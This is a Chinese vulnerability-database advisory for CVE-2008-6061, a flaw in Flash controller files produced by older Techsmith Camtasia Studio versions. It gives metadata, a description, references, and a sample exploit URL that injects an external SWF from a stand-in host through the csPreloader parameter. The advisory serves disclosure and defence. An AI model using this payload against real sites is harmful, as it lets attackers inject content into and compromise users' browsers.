Techsmith Camtasia Studio 'csPreloader' 远程代码执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1114201 漏洞类型 跨站脚本
发布时间 2008-01-02 更新时间 2009-02-19
CVE编号 CVE-2008-6061 CNNVD-ID CNNVD-200902-091
漏洞平台 Multiple CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/30972
https://www.securityfocus.com/bid/27107
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-091
|漏洞详情
CamtasiaStudio是Techsmith开发的一款屏幕记录工具。CamtasiaStudio5之前版本创建的任意ShockwaveFlash(SWF)控制器文件中的ActionScript存在跨站脚本攻击漏洞。远程攻击者可以借助csPreloader参数中的一个URL,注入任意的额外的SWF内容。
|漏洞EXP
source: http://www.securityfocus.com/bid/27107/info

Camtasia Studio is prone to a remote code-execution vulnerability because the application fails to properly sanitize user-supplied input.

A successful exploit will allow an attacker to compromise the application and the underlying system; other attacks are also possible.

NOTE: This vulnerability was initially considered a cross-site scripting issue, but further analysis reveals that this is a remote code-execution vulnerability.

http://www.example.com/Example_controller.swf?csPreloader=http://www.example2.com/DoKnowEvil.swf%3f
|受影响的产品
TechSmith Camtasia Studio 4.0.2
|参考资料

来源:US-CERT
名称:VU#249337
链接:http://www.kb.cert.org/vuls/id/249337
来源:BID
名称:27107
链接:http://www.securityfocus.com/bid/27107
来源:BUGTRAQ
名称:20080102XSSVulnerabilitiesinCommonShockwaveFlashFiles
链接:http://www.securityfocus.com/archive/1/archive/1/485722/100/100/threaded
来源:VUPEN
名称:ADV-2008-0066
链接:http://www.frsirt.com/english/advisories/2008/0066
来源:SECUNIA
名称:28311
链接:http://secunia.com/advisories/28311
来源:MISC
链接:http://docs.google.com/View?docid=ajfxntc4dmsq_14dt57ssdw